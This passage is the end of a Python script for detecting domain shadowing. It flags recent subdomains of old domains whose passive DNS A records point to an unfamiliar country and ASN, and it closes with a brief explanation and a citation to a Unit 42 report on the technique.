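        if candidate in DOMAIN_AGE:
            return candidate
    return fqdn


def days_between(earlier: str, later: str) -> int:
    return (date.fromisoformat(later) - date.fromisoformat(earlier)).days


def shadowed_candidates(records, asof: str = "2022-06-30", min_apex_age_days: int = 3 * 365,
                        max_sub_age_days: int = 90) -> Dict[str, List[Tuple[str, str, str, str]]]:
    """Return {apex: [(subdomain, ip, country, asn), ...]} for subdomains that are
    recent, hang off a long-registered apex, and resolve into a country and ASN
    that none of the apex's older records ever used."""
    by_apex = defaultdict(list)
    for first_seen, fqdn, rrtype, rdata in records:
        if rrtype == "A":
            by_apex[apex_of(fqdn)].append((first_seen, fqdn, rdata))

    findings: Dict[str, List[Tuple[str, str, str, str]]] = {}
    for apex, rows in by_apex.items():
        if apex not in DOMAIN_AGE or days_between(DOMAIN_AGE[apex], asof) < min_apex_age_days:
            continue  # a young domain has no reputation worth borrowing
        # Hosting footprint established by the apex's older, settled records.
        baseline = {IP_INFO[ip] for fs, _, ip in rows
                    if days_between(fs, asof) > max_sub_age_days and ip in IP_INFO}
        for fs, fqdn, ip in rows:
            if fqdn == apex or days_between(fs, asof) > max_sub_age_days:
                continue
            country, asn = IP_INFO.get(ip, ("??", "??"))
            # Unknown hosting on an aged apex is still worth a look, so an empty
            # baseline flags every recent subdomain rather than suppressing them.
            if not any(country == c or asn == a for c, a in baseline):
                findings.setdefault(apex, []).append((fqdn, ip, country, asn))
    return findings


if __name__ == "__main__":
    for apex, subs in shadowed_candidates(PDNS).items():
        print(apex)
        for sub in subs:
            print("  ", *sub)
```

Matching on either country or ASN keeps a legitimate move of the whole site to a new provider from lighting up, while still catching the pattern in the report of old AU and US domains sprouting subdomains that resolve into Russian address space.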
Szurdi, Janos, Rebekah Houser and Daping Liu, Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime, technical report, 21 September 2022. Available online at https://unit42.paloaltonetworks.com/domain-shadowing/.